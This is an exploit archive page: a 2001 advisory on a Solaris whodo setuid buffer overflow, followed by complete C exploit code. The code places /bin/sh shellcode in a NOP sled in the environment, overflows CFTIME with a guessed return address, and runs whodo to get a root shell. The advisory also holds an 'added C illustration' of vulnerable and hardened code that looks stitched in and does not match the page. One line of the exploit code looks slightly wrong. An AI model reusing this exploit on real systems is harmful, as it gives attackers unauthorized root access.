whodo-ex.c
Posted Jul 12, 2001
Authored by Pablo Sor

Solaris whodo local root exploit. Tested against SunOS 5.5.1, 5.7, and 5.8 for x86.

tags | exploit, x86, local, root
systems | solaris
SHA-256 | 75132e64c0b577687b4b50af180faba96a00dcb5b64fa8ba8042f7cbbbd10957

Vulnerability in Solaris whodo 

Date Published: July 5, 2001

Advisory ID: N/A

Bugtraq ID: 2935

CVE CAN: None currently assigned.

Title: Solaris whodo Buffer Overflow Vulnerability

Class: Boundary Error Condition

Remotely Exploitable: No

Locally Exploitable: Yes

Vulnerability Description:

The whodo program is installed setuid root by default in Solaris.
It contains a vulnerability in its handling of data taken from environment
variables: if such a variable exceeds a predefined length, an exploitable
stack overflow occurs.
By exploiting this vulnerability an attacker can gain effective uid root.
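The bug class the advisory describes, as an added C illustration (not whodo's source, which this page does not include): a setuid program copying an environment value such as CFTIME into a fixed-size stack buffer, beside a hardened lookup that rejects over-long values and ignores caller-supplied environment when the process holds privileges the invoking user lacks. TIMEFMT_MAX, the default format string and the function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define TIMEFMT_MAX 64   /* hypothetical fixed buffer size, not whodo's */

/* Vulnerable pattern (illustrative, not whodo's source): an environment value
 * is copied into a fixed-size stack buffer with no length check, so a value of
 * TIMEFMT_MAX bytes or more overwrites the saved frame pointer and return
 * address. Shown for contrast only; nothing below calls it. */
void apply_time_format_unsafe(const char *env_value)
{
    char fmt[TIMEFMT_MAX];
    strcpy(fmt, env_value);   /* no bound check */
}

/* Hardened version. Returns 1 if env_value was accepted and copied, 0 if the
 * built-in default was used instead, -1 if out cannot hold the default.
 * Over-long values are rejected rather than truncated, and a privileged
 * process ignores the caller-controlled environment entirely. */
int load_time_format(const char *env_value, int privileged,
                     char *out, size_t out_len)
{
    static const char dflt[] = "%a %b %e %H:%M:%S %Y"; /* assumed default */
    size_t n;

    if (out == NULL || out_len < sizeof dflt)
        return -1;
    if (env_value == NULL || privileged || (n = strlen(env_value)) >= out_len) {
        memcpy(out, dflt, sizeof dflt);
        return 0;
    }
    memcpy(out, env_value, n + 1);
    return 1;
}

/* The setuid-root situation the advisory describes: effective ids differ
 * from the real ids of the user who ran the program. */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

int main(void)
{
    char fmt[TIMEFMT_MAX];
    int rc = load_time_format(getenv("CFTIME"), running_privileged(),
                              fmt, sizeof fmt);
    printf("rc=%d format=\"%s\"\n", rc, fmt);
    return 0;
}
```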

Vulnerable Packages/Systems:

SunOS 5.8
SunOS 5.7
SunOS 5.5.1

(not tested on other versions)

Solution/Vendor:

Sun Microsystems was notified on June 28, 2001. Patches are expected
shortly.

Quick Fix:

Clear the suid bit of

/usr/sbin/sparcv7/whodo (SunOS 5.8 Sparc)
/usr/sbin/i86/whodo (SunOS 5.8, 5.7 Intel)
/usr/sbin/whodo (SunOS 5.5.1)

Credits:

This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
psor@afip.gov.ar, psor@ccc.uba.ar

This advisory was drafted with the help of the SecurityFocus.com Vulnerability
Help Team. For more information or assistance drafting advisories please mail
vulnhelp@securityfocus.com.

Technical Description - Exploit/Concept Code:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
/usr/sbin/i86/whodo overflow proof of concept.

Pablo Sor, Buenos Aires, Argentina 06/2001
psor@afip.gov.ar, psor@ccc.uba.ar

works against x86 solaris 8

default offset +/- 100 should work.

*/

/* current stack pointer (x86 gcc idiom: value is left in %eax) */
long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{

char shell[]=
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff";

unsigned long magic = get_esp() + 1180; /* default offset */

unsigned char buf[800];
char *env;

/* SOR: 400-byte NOP sled carrying the shellcode */
env = (char *) malloc(400*sizeof(char));
memset(env,0x90,400);
memcpy(env+160,shell,strlen(shell));
memcpy(env,"SOR=",4);
buf[399]=0;
putenv(env);

/* CFTIME: over-long value that triggers the overflow in whodo */
memset(buf,0x41,800);
memcpy(buf+271,&magic,4);
memcpy(buf,"CFTIME=",7);
buf[799]=0;
putenv(buf);

system("/usr/sbin/i86/whodo");
}

--
Pablo Sor
psor@afip.gov.ar, psor@ccc.uba.ar